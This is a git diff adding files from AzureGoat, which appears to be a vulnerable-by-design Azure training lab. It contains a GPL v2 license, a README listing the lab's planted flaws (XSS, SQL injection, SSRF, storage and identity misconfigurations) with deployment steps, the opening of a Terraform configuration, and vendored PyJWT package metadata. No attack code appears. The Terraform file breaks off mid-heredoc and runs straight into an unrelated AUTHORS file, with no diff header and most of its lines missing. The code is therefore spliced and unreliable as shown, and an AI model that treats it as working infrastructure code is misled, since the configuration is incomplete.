diff --git a/AzureGoat.pdf b/AzureGoat.pdf new file mode 100644 index 0000000..bde2b63 Binary files /dev/null and b/AzureGoat.pdf differ diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..89e08fb --- /dev/null +++ b/LICENSE @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. 
The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. 
+ +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. 
Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. 
If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+                            NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+                     END OF TERMS AND CONDITIONS
+
+            How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License along
+    with this program; if not, write to the Free Software Foundation, Inc.,
+    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+    Gnomovision version 69, Copyright (C) year name of author
+    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary.  Here is a sample; alter the names:
+
+  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+  `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+  <signature of Ty Coon>, 1 April 1989
+  Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs.  If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..7c3eac2
--- /dev/null
+++ b/README.md
@@ -0,0 +1,143 @@
+# AzureGoat : A Damn Vulnerable Azure Infrastructure
+
+![1](https://user-images.githubusercontent.com/25884689/183740998-da6f7ae7-2df0-4557-a6f5-2f0040ebe0dc.png)
+
+Compromising an organization's cloud infrastructure is like sitting on a gold mine for attackers. Sometimes, a simple misconfiguration or a vulnerability in a web application is all an attacker needs to compromise the entire infrastructure. Since the cloud is relatively new, many developers are not fully aware of the threat landscape, and they end up deploying vulnerable cloud infrastructure. Microsoft Azure has become the second-largest cloud infrastructure provider by market share (as per multiple reports), just behind AWS. There are numerous tools and vulnerable applications that let security professionals practice attack/defense on AWS, but that is not the case with Azure: far fewer options are available to the community.
+
+AzureGoat is a vulnerable-by-design infrastructure on Azure featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfigurations in services such as App Functions, CosmosDB, Storage Accounts, Automation, and Identities. AzureGoat mimics real-world infrastructure, but with added vulnerabilities. It features multiple escalation paths and is focused on a black-box approach.
+
+The project will be divided into modules, with each module being a separate web application powered by a varied tech stack and development practices. It leverages IaC through Terraform to ease the deployment process.
+
+**Presented at**
+
+- [BlackHat USA 2022](https://www.blackhat.com/us-22/arsenal/schedule/index.html#azuregoat--a-damn-vulnerable-azure-infrastructure-28000)
+- [DC 30: Demo Labs](https://forum.defcon.org/node/242061)
+
+## Built With
+
+* Azure
+* React
+* Python 3
+* Terraform
+
+## Vulnerabilities
+
+The project is scheduled to encompass all significant vulnerabilities, including the OWASP Top 10 (2021) and popular cloud misconfigurations.
+Currently, the project contains the following vulnerabilities/misconfigurations:
+
+* XSS
+* SQL Injection
+* Insecure Direct Object Reference
+* Server-Side Request Forgery on the App Function Environment
+* Sensitive Data Exposure and Password Reset
+* Storage Account Misconfigurations
+* Identity Misconfigurations
+
+# Getting Started
+
+### Prerequisites
+* An Azure Account
+
+
+### Installation
+
+To ease the deployment process, the user just needs to clone this repo, log in to the Azure CLI, and then initialize and apply the Terraform configuration. This workflow deploys the whole infrastructure and outputs the hosted application's URL.
+
+Here are the steps to follow:
+
+**Step 1.** Clone the repo
+
+```sh
+git clone https://github.com/ine-labs/AzureGoat
+```
+
+**Step 2.** Log in to the Azure CLI
+
+```sh
+az login
+```
+
+And follow the steps to sign in.
+
+**Step 3.** Use Terraform to deploy AzureGoat, running from the cloned directory
+
+```sh
+cd AzureGoat
+terraform init
+terraform apply --auto-approve
+```
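+
+Once the apply finishes, Terraform prints the deployed application's URL as an output. A minimal sketch for retrieving it again later — run from the same directory, assuming the local state files from the apply are still present (the exact output name is defined by the Terraform configuration and may differ):
+
+```sh
+# Re-read the outputs from the existing Terraform state; makes no changes to the infrastructure
+terraform output
+```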
+
+# Modules
+
+## Module 1
+
+The first module features a serverless blog application built on Azure App Functions, Storage Accounts, CosmosDB, and Azure Automation. It contains various web application vulnerabilities and facilitates the exploitation of misconfigured Azure resources.
+
+Overview of the escalation paths for Module 1:
+
+![6](https://user-images.githubusercontent.com/25884689/183740988-9fa75f39-8c85-4db7-a5a9-c0f4acdb2783.png)
+
+# Contributors
+
+Nishant Sharma, Director, Lab Platform, INE
+
+Jeswin Mathai, Chief Architect, Lab Platform, INE
+
+Rachna Umaraniya, Cloud Developer, INE
+
+Sherin Stephen, Software Engineer (Cloud), INE
+
+
+# Solutions
+
+The manuals are available in the [solutions](solutions/) directory.
+
+Module 1 Exploitation Videos:
+
+# Documentation
+
+For more details, refer to the "AzureGoat.pdf" file. It contains the slide deck used for presentations.
+
+# Screenshots
+
+Blog Application Homepage
+
+![1](https://user-images.githubusercontent.com/25884689/183741003-04609eaa-63fd-43c3-9851-d1e10b5763a9.png)
+
+Blog Application Login Portal
+
+![2](https://user-images.githubusercontent.com/65826354/183737940-b1fa7b71-82cb-4744-af6a-22386c22a934.png)
+
+Blog Application Register Page
+
+![3](https://user-images.githubusercontent.com/65826354/183737954-2ede9a5b-0797-4eef-8329-9871c14327fd.png)
+
+Blog Application Logged-in Dashboard
+
+![4](https://user-images.githubusercontent.com/65826354/183737967-a2af9d1e-9805-4658-8055-f3f7ee982b63.png)
+
+Blog Application User Profile
+
+![5](https://user-images.githubusercontent.com/65826354/183737979-20c60ca1-14e0-4da9-a3c7-161ef9a62591.png)
+
+## Contribution Guidelines
+
+* Contributions in the form of code improvements, module updates, feature improvements, and any general suggestions are welcome.
+* Improvements to the functionality of the current modules are also welcome.
+* The source code for each module can be found in ``modules/module-<module number>/src``; this can be used to modify the existing application code.
+
+# License
+
+This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License v2 as published by the Free Software Foundation.
+
+This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.
+
+# Sister Projects
+
+- [AWSGoat](https://github.com/ine-labs/AWSGoat)
+- GCPGoat (Coming Soon)
+- [PA Toolkit (Pentester Academy Wireshark Toolkit)](https://github.com/pentesteracademy/patoolkit)
+- [ReconPal: Leveraging NLP for Infosec](https://github.com/pentesteracademy/reconpal)
+- [VoIPShark: Open Source VoIP Analysis Platform](https://github.com/pentesteracademy/voipshark)
+- [BLEMystique](https://github.com/pentesteracademy/blemystique)
diff --git a/main.tf b/main.tf
new file mode 100644
index 0000000..f0b54d3
--- /dev/null
+++ b/main.tf
@@ -0,0 +1,583 @@
+terraform {
+  required_version = ">= 0.13"
+  required_providers {
+    azurerm = {
+      source  = "hashicorp/azurerm"
+      version = "~> 3.11.0"
+    }
+    random = {
+      source  = "hashicorp/random"
+      version = "~> 3.1.0"
+    }
+  }
+}
+
+provider "azurerm" {
+  features {}
+}
+
+
+variable "resource_group" {
+  default = "azuregoat_app"
+}
+
+variable "location" {
+  type    = string
+  default = "eastus"
+}
+
+
+# Serverless CosmosDB account that backs the blog application's data
+resource "azurerm_cosmosdb_account" "db" {
+  name                = "ine-cosmos-db-data-${random_id.randomId.dec}"
+  location            = "eastus"
+  resource_group_name = var.resource_group
+  offer_type          = "Standard"
+  kind                = "GlobalDocumentDB"
+
+  consistency_policy {
+    consistency_level       = "BoundedStaleness"
+    max_interval_in_seconds = 300
+    max_staleness_prefix    = 100000
+  }
+
+  capabilities {
+    name = "EnableServerless"
+  }
+
+  geo_location {
+    location          = "eastus"
+    failover_priority = 0
+  }
+}
+
+# Populates the database with seed data via a local shell command
+resource "null_resource" "file_populate_data" {
+  provisioner "local-exec" {
+    command = <
+
+
+Original author
+------------------
+
+- progrium
+
+
+Patches and Suggestions
+-----------------------
+
+ - Boris Feld
+
+ - Åsmund Ødegård
+   Adding support for RSA-SHA256 privat/public signature.
+
+ - Mark Adams
+
+ - Wouter Bolsterlee
+
+ - Michael Davis
+
+ - Vinod Gupta
+
+ - Derek Weitzel
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/INSTALLER
new file mode 100644
index 0000000..4660be2
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/INSTALLER
@@ -0,0 +1 @@
+pip
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/LICENSE
new file mode 100644
index 0000000..e8d44d1
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/LICENSE
@@ -0,0 +1,21 @@
+The MIT License (MIT)
+
+Copyright (c) 2015 José Padilla
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/METADATA
new file mode 100644
index 0000000..8a9b631
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/METADATA
@@ -0,0 +1,115 @@
+Metadata-Version: 2.1
+Name: PyJWT
+Version: 1.7.1
+Summary: JSON Web Token implementation in Python
+Home-page: http://github.com/jpadilla/pyjwt
+Author: Jose Padilla
+Author-email: hello@jpadilla.com
+License: MIT
+Keywords: jwt json web token security signing
+Platform: UNKNOWN
+Classifier: Development Status :: 5 - Production/Stable
+Classifier: Intended Audience :: Developers
+Classifier: Natural Language :: English
+Classifier: License :: OSI Approved :: MIT License
+Classifier: Programming Language :: Python
+Classifier: Programming Language :: Python :: 2.7
+Classifier: Programming Language :: Python :: 3.4
+Classifier: Programming Language :: Python :: 3.5
+Classifier: Programming Language :: Python :: 3.6
+Classifier: Programming Language :: Python :: 3.7
+Classifier: Topic :: Utilities
+Provides-Extra: crypto
+Requires-Dist: cryptography (>=1.4) ; extra == 'crypto'
+Provides-Extra: flake8
+Requires-Dist: flake8 ; extra == 'flake8'
+Requires-Dist: flake8-import-order ; extra == 'flake8'
+Requires-Dist: pep8-naming ; extra == 'flake8'
+Provides-Extra: test
+Requires-Dist: pytest (<5.0.0,>=4.0.1) ; extra == 'test'
+Requires-Dist: pytest-cov (<3.0.0,>=2.6.0) ; extra == 'test'
+Requires-Dist: pytest-runner (<5.0.0,>=4.2) ; extra == 'test'
+
+PyJWT
+=====
+
+.. image:: https://travis-ci.com/jpadilla/pyjwt.svg?branch=master
+   :target: http://travis-ci.com/jpadilla/pyjwt?branch=master
+
+.. image:: https://ci.appveyor.com/api/projects/status/h8nt70aqtwhht39t?svg=true
+   :target: https://ci.appveyor.com/project/jpadilla/pyjwt
+
+.. image:: https://img.shields.io/pypi/v/pyjwt.svg
+   :target: https://pypi.python.org/pypi/pyjwt
+
+.. image:: https://coveralls.io/repos/jpadilla/pyjwt/badge.svg?branch=master
+   :target: https://coveralls.io/r/jpadilla/pyjwt?branch=master
+
+.. image:: https://readthedocs.org/projects/pyjwt/badge/?version=latest
+   :target: https://pyjwt.readthedocs.io
+
+A Python implementation of `RFC 7519 <https://tools.ietf.org/html/rfc7519>`_. Original implementation was written by `@progrium <https://github.com/progrium>`_.
+
+Sponsor
+-------
+
++--------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+| |auth0-logo| | If you want to quickly add secure token-based authentication to Python projects, feel free to check Auth0's Python SDK and free plan at `auth0.com/overview <https://auth0.com/overview>`_. |
++--------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+
+..
|auth0-logo| image:: https://user-images.githubusercontent.com/83319/31722733-de95bbde-b3ea-11e7-96bf-4f4e8f915588.png + +Installing +---------- + +Install with **pip**: + +.. code-block:: sh + + $ pip install PyJWT + + +Usage +----- + +.. code:: python + + >>> import jwt + >>> encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256') + 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzb21lIjoicGF5bG9hZCJ9.4twFt5NiznN84AWoo1d7KO1T_yoc0Z6XOpOVswacPZg' + + >>> jwt.decode(encoded, 'secret', algorithms=['HS256']) + {'some': 'payload'} + + +Command line +------------ + +Usage:: + + pyjwt [options] INPUT + +Decoding examples:: + + pyjwt --key=secret decode TOKEN + pyjwt decode --no-verify TOKEN + +See more options executing ``pyjwt --help``. + + +Documentation +------------- + +View the full docs online at https://pyjwt.readthedocs.io/en/latest/ + + +Tests +----- + +You can run tests from the project root after cloning with: + +.. code-block:: sh + + $ python setup.py test + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/RECORD new file mode 100644 index 0000000..5a41c2d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/RECORD @@ -0,0 +1,36 @@ +../../bin/pyjwt,sha256=68OSAFepGPeHFjt5M9VqvTqoHkhg-xWV9LKtwBaOTT8,211 +PyJWT-1.7.1.dist-info/AUTHORS,sha256=rahh5ZJ3f4RSF4X1_K1DvxTRm4Hy45QiMP7dDG_-yrE,595 +PyJWT-1.7.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +PyJWT-1.7.1.dist-info/LICENSE,sha256=7IKvgVtfnahoWvswDMW-t5SeHCK3m2wcBUeWzv32ysY,1080 +PyJWT-1.7.1.dist-info/METADATA,sha256=wIohFuzbkeGUiMkkD5U98z520aUoY6UnmsfDl4vVHRI,3878 +PyJWT-1.7.1.dist-info/RECORD,, +PyJWT-1.7.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +PyJWT-1.7.1.dist-info/WHEEL,sha256=_wJFdOYk7i3xxT8ElOkUJvOdOvfNGbR9g-bf6UQT6sU,110 +PyJWT-1.7.1.dist-info/entry_points.txt,sha256=Xl_tLkGbTgywYa7PwaEY2xSiCtVtM2PdHTL4CW_n9dM,45 +PyJWT-1.7.1.dist-info/top_level.txt,sha256=RP5DHNyJbMq2ka0FmfTgoSaQzh7e3r5XuCWCO8a00k8,4 +jwt/__init__.py,sha256=zzpUkNjnVRNWZKLBgn-t3fR3IWVdCWekrAKtsZWkCoQ,810 +jwt/__main__.py,sha256=_rMsGakpyw1N023P8QOjCgbCxhXSCNIg92YpmUhQGMk,4162 +jwt/__pycache__/__init__.cpython-39.pyc,, +jwt/__pycache__/__main__.cpython-39.pyc,, +jwt/__pycache__/algorithms.cpython-39.pyc,, +jwt/__pycache__/api_jws.cpython-39.pyc,, +jwt/__pycache__/api_jwt.cpython-39.pyc,, +jwt/__pycache__/compat.cpython-39.pyc,, +jwt/__pycache__/exceptions.cpython-39.pyc,, +jwt/__pycache__/help.cpython-39.pyc,, +jwt/__pycache__/utils.cpython-39.pyc,, +jwt/algorithms.py,sha256=kL1ARjxNL8JeuxEpWS8On14qJWomMX_A_ncIrnZhBrA,13336 +jwt/api_jws.py,sha256=wQxbg_cYR4hAJl4-9Ijf29B46NrOKhruXS7ANPFqkZ8,8095 +jwt/api_jwt.py,sha256=NKRiCsTcMd0B5N-74zvqBYpQuxBxC4f6TCLM6P0jxVU,7905 +jwt/compat.py,sha256=VG2zhmZFQ5spP0AThSVumRogymUXORz6fxA1jTew-cA,1624 +jwt/contrib/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +jwt/contrib/__pycache__/__init__.cpython-39.pyc,, +jwt/contrib/algorithms/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +jwt/contrib/algorithms/__pycache__/__init__.cpython-39.pyc,, +jwt/contrib/algorithms/__pycache__/py_ecdsa.cpython-39.pyc,, +jwt/contrib/algorithms/__pycache__/pycrypto.cpython-39.pyc,, +jwt/contrib/algorithms/py_ecdsa.py,sha256=tSTUrwx-u14DJcqAChRzJG-wf7bEY2Gv2hI5xSZZNjk,1771 
